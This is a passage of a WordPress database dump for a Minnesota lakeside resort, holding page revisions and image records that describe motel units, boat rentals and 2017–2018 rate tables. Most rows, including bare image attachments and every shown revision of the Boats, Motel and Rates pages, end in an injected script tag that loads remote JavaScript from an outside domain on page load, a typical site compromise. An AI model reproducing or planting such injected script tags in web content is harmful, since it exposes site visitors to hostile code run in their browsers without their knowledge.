17:54:40','',46,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001.jpg',0,'attachment','image/jpeg',0),(541,2,'2017-02-15 11:55:36','2017-02-15 17:55:36','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN4201[1]','','inherit','open','closed','','dscn42011','','','2017-02-15 11:55:36','2017-02-15 17:55:36','',46,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011.jpg',0,'attachment','image/jpeg',0),(542,2,'2017-02-15 11:56:35','2017-02-15 17:56:35','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN4204[1]','','inherit','open','closed','','dscn42041','','','2017-02-15 11:56:35','2017-02-15 17:56:35','',46,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42041.jpg',0,'attachment','image/jpeg',0),(543,2,'2017-02-15 12:01:22','2017-02-15 18:01:22','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n<strong>Kitchenettes #1, 3, 5 &amp; 7</strong>\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds Maximum people 4\r\n\r\nalso included in a Kitchenette unit is:\r\nA Stove (an Oven only in unit # 7), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n\r\n<strong>Sleepers #2, #4 and #6</strong>\r\n\r\nAre one bedroom - 1 bathroom and 1 Double Bed  with a hide a bed sofa in the main living area.\r\nMaximum people 4.\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-541\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42041-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-542\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-540\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-539\" />\r\n\r\n\r\n\r\n\r\n\r\n<strong>Lakeside Villa #9</strong>\r\n\r\nUnit # 9 is one of the most popular units newly remodeled in 2015\r\n#9 has one Queen  bed, and two single beds one bathroom \r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-468\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-467\" />\r\nMAXIMUM PEOPLE IS FOUR\r\nNO PETS NO SMOKING\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2017-02-15 12:01:22','2017-02-15 18:01:22','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(546,2,'2017-02-15 15:19:13','2017-02-15 21:19:13','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN2615','','inherit','open','closed','','dscn2615','','','2017-02-15 15:19:13','2017-02-15 21:19:13','',0,'http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2615.jpg',0,'attachment','image/jpeg',0),(547,2,'2017-02-15 15:20:16','2017-02-15 21:20:16','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN2633','','inherit','open','closed','','dscn2633','','','2017-02-15 15:20:16','2017-02-15 21:20:16','',0,'http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2633.jpg',0,'attachment','image/jpeg',0),(548,2,'2017-02-15 15:20:52','2017-02-15 21:20:52','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN2644','','inherit','open','closed','','dscn2644','','','2017-02-15 15:20:52','2017-02-15 21:20:52','',0,'http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2644.jpg',0,'attachment','image/jpeg',0),(549,2,'2017-02-15 15:21:33','2017-02-15 21:21:33','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN2723','','inherit','open','closed','','dscn2723','','','2017-02-15 15:33:04','2017-02-15 21:33:04','',61,'http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2723.jpg',0,'attachment','image/jpeg',0),(550,2,'2017-02-15 15:25:15','2017-02-15 21:25:15','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','_DSC0342','','inherit','open','closed','','_dsc0342','','','2017-02-15 15:40:19','2017-02-15 21:40:19','',61,'http://ashbyresort.com/wp-content/uploads/2017/02/DSC0342.jpg',0,'attachment','image/jpeg',0),(551,2,'2017-02-15 15:26:07','2017-02-15 21:26:07','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3462','','inherit','open','closed','','dscn3462','','','2017-02-15 15:41:55','2017-02-15 21:41:55','',61,'http://ashbyresort.com/wp-content/uploads/2017/02/DSCN3462.jpg',0,'attachment','image/jpeg',0),(552,2,'2017-02-15 15:26:50','2017-02-15 21:26:50','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3828','','inherit','open','closed','','dscn3828-2','','','2017-02-15 15:39:35','2017-02-15 21:39:35','',61,'http://ashbyresort.com/wp-content/uploads/2017/02/DSCN3828.jpg',0,'attachment','image/jpeg',0),(553,2,'2017-02-15 15:30:13','2017-02-15 21:30:13','<img class=\"alignnone wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" />\r\n<img class=\"alignnone size-medium wp-image-494\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3711-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n<img class=\"alignnone size-medium wp-image-497\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3841-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n<img class=\"alignnone size-medium wp-image-278\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Bandemer-005-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nYou can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat.<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-02-15 15:30:13','2017-02-15 21:30:13','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(554,2,'2017-02-15 15:32:14','2017-02-15 21:32:14','<img class=\"alignnone wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" />\r\n20 foot pontoon With 25 HP Yamaha 4 stroke\r\n<img class=\"alignnone size-medium wp-image-494\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3711-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n<img class=\"alignnone size-medium wp-image-497\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3841-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n<img class=\"alignnone size-medium wp-image-278\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Bandemer-005-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nYou can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-02-15 15:32:14','2017-02-15 21:32:14','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(555,2,'2017-02-15 15:34:04','2017-02-15 21:34:04','<img class=\"alignnone wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" />\r\n20 foot pontoon With 25 HP Yamaha 4 stroke Rental\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2723-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-549\" />\r\n16 foot Lund Fishing Boat with 15 HP Yamaha Rental\r\n<img class=\"alignnone size-medium wp-image-494\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3711-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n<img class=\"alignnone size-medium wp-image-497\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3841-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n<img class=\"alignnone size-medium wp-image-278\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Bandemer-005-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nYou can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-02-15 15:34:04','2017-02-15 21:34:04','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(556,2,'2017-02-15 15:36:54','2017-02-15 21:36:54','<img class=\"alignnone wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" />\r\n20 foot pontoon With 25 HP Yamaha 4 stroke Rental\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2723-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-549\" />\r\n16 foot Lund Fishing Boat with 15 HP Yamaha Rental\r\n<img class=\"alignnone size-medium wp-image-494\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3711-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nFREE USE OF THE PADDLE BOAT\r\n<img class=\"alignnone size-medium wp-image-497\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3841-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nBOAT LAUNCH ON SITE $ 5.00 ONE TIME CHARGE\r\n<img class=\"alignnone size-medium wp-image-278\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Bandemer-005-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nYou can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-02-15 15:36:54','2017-02-15 21:36:54','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(557,2,'2017-02-15 15:38:53','2017-02-15 21:38:53','<img class=\"alignnone wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" />\r\n20 foot pontoon With 25 HP Yamaha 4 stroke Rental\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2723-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-549\" />\r\n16 foot Lund Fishing Boat with 15 HP Yamaha Rental\r\n<img class=\"alignnone size-medium wp-image-494\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3711-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nFREE USE OF THE PADDLE BOAT\r\n<img class=\"alignnone size-medium wp-image-497\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3841-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nBOAT LAUNCH ON SITE $ 5.00 ONE TIME CHARGE\r\n<img class=\"alignnone size-medium wp-image-278\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Bandemer-005-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />FREE CANOE AND KAYAK USE TO ALL GUESTS\r\nYou can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-02-15 15:38:53','2017-02-15 21:38:53','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(558,2,'2017-02-15 15:40:46','2017-02-15 21:40:46','<img class=\"alignnone wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" />\r\n20 foot pontoon With 25 HP Yamaha 4 stroke Rental\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2723-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-549\" />\r\n16 foot Lund Fishing Boat with 15 HP Yamaha Rental\r\n<img class=\"alignnone size-medium wp-image-494\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3711-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nFREE USE OF THE PADDLE BOAT\r\n<img class=\"alignnone size-medium wp-image-497\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3841-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nBOAT LAUNCH ON SITE $ 5.00 ONE TIME CHARGE\r\n<img class=\"alignnone size-medium wp-image-278\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Bandemer-005-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />FREE CANOE AND KAYAK USE TO ALL GUESTS\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN3828-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-552\" />\r\nRENT A PADDLE BOARD\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSC0342-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" class=\"alignnone size-medium wp-image-550\" />\r\nBOAT LIFT RENTAL\r\nYou can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-02-15 15:40:46','2017-02-15 21:40:46','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(559,2,'2017-02-15 15:42:22','2017-02-15 21:42:22','<img class=\"alignnone wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" />\r\n20 foot pontoon With 25 HP Yamaha 4 stroke Rental\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2723-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-549\" />\r\n16 foot Lund Fishing Boat with 15 HP Yamaha Rental\r\n<img class=\"alignnone size-medium wp-image-494\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3711-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nFREE USE OF THE PADDLE BOAT\r\n<img class=\"alignnone size-medium wp-image-497\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3841-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nBOAT LAUNCH ON SITE $ 5.00 ONE TIME CHARGE\r\n<img class=\"alignnone size-medium wp-image-278\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Bandemer-005-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />FREE CANOE AND KAYAK USE TO ALL GUESTS\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN3828-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-552\" />\r\nRENT A PADDLE BOARD\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSC0342-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" class=\"alignnone size-medium wp-image-550\" />\r\nBOAT LIFT RENTAL\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN3462-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-551\" />\r\nPLENTY OF BOAT SLIPS AVAILABLE\r\nYou can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-02-15 15:42:22','2017-02-15 21:42:22','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(560,2,'2017-02-15 15:43:44','2017-02-15 21:43:44','<img class=\"alignnone wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" />\r\n20 foot pontoon With 25 HP Yamaha 4 stroke Rental\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN2723-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-549\" />\r\n16 foot Lund Fishing Boat with 15 HP Yamaha Rental\r\n<img class=\"alignnone size-medium wp-image-494\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3711-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nFREE USE OF THE PADDLE BOAT\r\n<img class=\"alignnone size-medium wp-image-497\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3841-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nBOAT LAUNCH ON SITE $ 5.00 ONE TIME CHARGE\r\n<img class=\"alignnone size-medium wp-image-278\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Bandemer-005-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\nFREE CANOE AND KAYAK USE TO ALL GUESTS\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN3828-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-552\" />\r\nRENT A PADDLE BOARD\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSC0342-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" class=\"alignnone size-medium wp-image-550\" />\r\nBOAT LIFT RENTAL\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/02/DSCN3462-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-551\" />\r\nPLENTY OF BOAT SLIPS AVAILABLE\r\nYou can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-02-15 15:43:44','2017-02-15 21:43:44','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(575,2,'2017-03-01 09:43:46','2017-03-01 15:43:46','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Explore Minnesota','','inherit','closed','closed','','2-revision-v1','','','2017-03-01 09:43:46','2017-03-01 15:43:46','',2,'http://ashbyresort.com/2-revision-v1/',0,'revision','',0),(585,2,'2017-05-27 12:23:27','2017-05-27 17:23:27','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2017 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$875.00,$1050.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nTent & Popups,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nRV/Travel Trailers,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-05-27 12:23:27','2017-05-27 17:23:27','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(591,2,'2017-12-01 11:48:21','2017-12-01 17:48:21','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2018 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$900.00,$1,100.00,4\r\nCabins (#10 #11 #12),2,$180.00,$230.00,$900.00,\"$1,100.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$1,000.00,\"$1,200.00\",8\r\nTent & Popups,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nRV/Travel Trailers,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-12-01 11:48:21','2017-12-01 17:48:21','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(592,2,'2017-12-01 11:52:56','2017-12-01 17:52:56','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2018 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$900.00,$1,100.00,4\r\nCabins (#10 #11 #12),2,$180.00,$230.00,$900.00,\"$1,100.00\",8\r\nCabins (#13 